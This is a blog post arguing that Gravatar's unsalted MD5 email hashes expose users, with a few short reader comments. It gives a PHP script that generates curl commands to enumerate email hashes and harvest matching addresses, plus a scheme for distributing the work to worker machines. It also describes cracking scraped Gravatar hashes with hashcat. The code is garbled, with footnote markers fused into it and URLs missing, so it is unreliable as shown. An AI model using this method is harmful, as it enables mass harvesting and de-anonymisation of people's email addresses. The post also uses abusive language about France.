Gravatar still sucks

Tuesday, 05 May, Year 7 d.Tr. | Author: Mircea Popescu

Let's begin with a picture - they're worth ten thousand emails from what I hear.


Yes, if you see your Gravatar image there it means I have your email now. Because Gravatar sucks, just like Automattic sucks, just like Disqus sucks, just like the entire bezzle-powered world sucks.

Unlike the previously announced attacksi, I simply used the following script to generate curl queries :

    $alph = array ("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
    "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
    "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0");
    // google uses a braindamaged private specii
    for ($i = 0; $i <= 1700000iii; $i++) {
        $over = $i;
        $mant = $over % 36;
        $string = $alph[$mant]; 
        while ($over > 0) {
          $over = floor($over / 36);
          $mant = $over % 36;
          if ($mant+$over > 1) $string .= $alph[$mant];
        echo "curl -o ".$string.".jpg"
            ,md5($string.""),"?s=32 \n";
        if ($i % 1000 == 135) echo "find . -size 1258c -delete\n
            find . -size 1267c -delete\n"iv;

If you host this on a server somewhere, you can have workers periodically connect to aquire a job chunkv through something as trivial as

    curl http://some.domain/script.php >

That bash script can then be executed, leaving behind a list of good hits (which you don't even have to retrieve, all you really need is a directory list). A half decent machine should be able to pull something like 50-100 links per second, which means that if you have say ten thousand available you can explore the entire space of one to six characters in a little over an

The approach has some advantages : it will verify emails (or, or whatever else you may care to check), and associate them with a Gravatar whether they were actually ever used on any website or notvii. Unlike the method described by Bongard et all, it also won't miss anything.viii In exchange, it's probably slow - don't expect much more than a few dozen hits per million tries.ix

Please stop empowering idiots, con men and government agents. Especially if you, like me, don't particularly enjoy living in a world populated by idiots, con men and government agents.

  1. One Dominique Bongard had the idea of sniffing up all the gravatars displayed on some random French website. Since the gravatar image is linked through a snippet of html that looks something like
      <img src=></img>

    and since they have to be included on the page to be visible, it's trivial to gather a sizable collection by merely browsing the web.

    The first string in that url is a plain unsalted (remember Fetlife ?) md5 hash of the corresponding email, which is not really all that hard to break, using something like hashcat's hybrid algorithms. With the advent of Bitcoin and the exponential increase in worldwide hashing power it has driven, it should come as no surprise that Bongard managed to retrieve the emails out of something like 40% of the hashes he collected.

    This obviously has very real implications in the thirld world country of France. Given its appaling record of human rights violations (merely expressing certain verboten oppinions is grounds for conviction in that God-forsaken shithole, not to mention trivialities like taking a paternity test, or lying about your age), having one's email leaked in this manner readily compares to having one's radio transmission triangulated by the Gestapo, or having one's typewriter identified as the source of самиздат.

    We should probably observe a moment of silence for all the innocent men and women Gravatar slaugthered, maliciously or ineptly as the case may be. []

  2. Capitals are ignored, dots are ignored, etc. []
  3. Enough to cover four character emails, but the number is obviously arbitrary []
  4. This line cleans up the directory periodically. It so happens that the gravatar fail hits come in two flarous, one 1`267 bytes long, the other 1`258 bytes long. Why exactly two is perhaps a mystery for another book. []
  5. You will need some mechanism to increment the job chunks as they're doled out, obviously. []
  6. 366 = 2`176`782`336 / 50 / 3600 / 10000 ~= 1.20, or 72 minutes. []
  7. Of course if they were ever used, each instance can then be located (through a service like Google's own image search, or any of the competitors'). []
  8. Speaking of which, don't you think it's a little strange that banal stuff like a program to scarf up all gravatar-email pairs and track them around the web was not included in the wikileaks/Snowden revelations, while all sorts of patently ridiculous kookware is included ? Asa putin ? Putin putin ? []
  9. Then again, computers are cheap these days - a whole month's worth of 50/second (~5 mn tries or so) shouldn't run one over a hundred dollars, probably ten being closer to norm - which would put the cost of acquiring emails in this manner at a few pennies per. Spammers sell "quality" email lists for about a degree of magnitude less than that, so it's probably not (or marginally not) an economic process to generate spamlists. Yet.

    This is important : Gravatar, through its ridoinculous unsalted md5 "technologies", sets the bar of your privacy at the level of "marginally not economical to harvest for spam". Why do you want anything to do with these assholes again ? []

Category: Meta psihoza
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.

6 Responses

  1. Hi :)

  2. Mircea Popescu`s avatar
    Mircea Popescu 
    Sunday, 10 May 2015

    Ce mai zici tu tucu-te!

  3. Seara buna, iaca nu mai zic nimic... sclavagesc in tacere!

  4. Mircea Popescu`s avatar
    Mircea Popescu 
    Tuesday, 12 May 2015

    Cica tacerea ie semn de-ntelepciune tu.

  5. Implementing this using something such as libcurl for extra speed is left as an exercise for the little "hackers" out there. :P

  6. Mircea Popescu`s avatar
    Mircea Popescu 
    Thursday, 21 May 2015


Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.